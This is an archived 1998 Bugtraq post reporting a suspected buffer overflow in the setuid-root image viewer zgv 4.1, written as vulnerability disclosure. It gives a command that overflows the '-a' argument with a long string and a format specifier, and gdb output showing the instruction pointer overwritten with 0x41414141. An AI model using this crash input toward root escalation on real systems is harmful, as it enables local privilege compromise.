Bugtraq mailing list archives
Overflow in zgv-4.1?
From: onix () AUTOBAHN MB CA (onix)
Date: Thu, 8 Oct 1998 00:08:13 -0500
Possible security risk in setuid zgv 4.1 which may lead to local root comprimise. zgv is installed setuid root by default. onix# zgv -a "`perl -e 'print "A" x 4000'`%s" Segmentation fault (core dumped) onix# gdb -c core GDB is free software and you are welcome to distribute copies of it under certain conditions; type "show copying" to see the conditions. There is absolutely no warranty for GDB; type "show warranty" for details. GDB 4.16 (i486-slackware-linux), Copyright 1996 Free Software Foundation, Inc. Core was generated by `zgv -a AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'. Program terminated with signal 11, Segmentation fault. #0 0x40121a48 in ?? () (gdb) backtrace #0 0x40121a48 in ?? () #1 0x41414141 in ?? () Cannot access memory at address 0x41414141. (gdb)
Current thread:
- linux 2.0.35 ip aliasing with aliased hwaddr Mike Baker (Oct 06)
- Re: linux 2.0.35 ip aliasing with aliased hwaddr Oliver Friedrichs (Oct 06)
- Redhat man exploit Neil Trobaugh (Oct 07)
- Re: Redhat man exploit Scott Stone (Oct 08)
- Computer Security Day (DISC 98) in Mexico Area de Seguridad en Computo (Oct 12)
- Re: Redhat man exploit Mike (Oct 12)
- Possible login name leak on SunOS 5.6 Pete Krawczyk (Oct 12)
- Re: Redhat man exploit John Brahy (Oct 09)
- Redhat man exploit Neil Trobaugh (Oct 07)
- Overflow in zgv-4.1? onix (Oct 07)
- Re: Overflow in zgv-4.1? Paul Boehm (Oct 09)
- The Cuartango Security Hole in IE4 Aleph One (Oct 12)
- SCO Openserver 5.0.5 syn-floodable Eric (Oct 08)
- Re: linux 2.0.35 ip aliasing with aliased hwaddr pedward () WEBCOM COM (Oct 08)
- more Netscape 4.07 javascript security Max Vision (Oct 08)
- Re: more Netscape 4.07 javascript security Peter W (Oct 11)
- Another Netscape 4.07 cache reading bug Georgi Guninski (Oct 08)
- Re: Another Netscape 4.07 cache reading bug Ken Williams (Oct 08)
- Re: linux 2.0.35 ip aliasing with aliased hwaddr Oliver Friedrichs (Oct 06)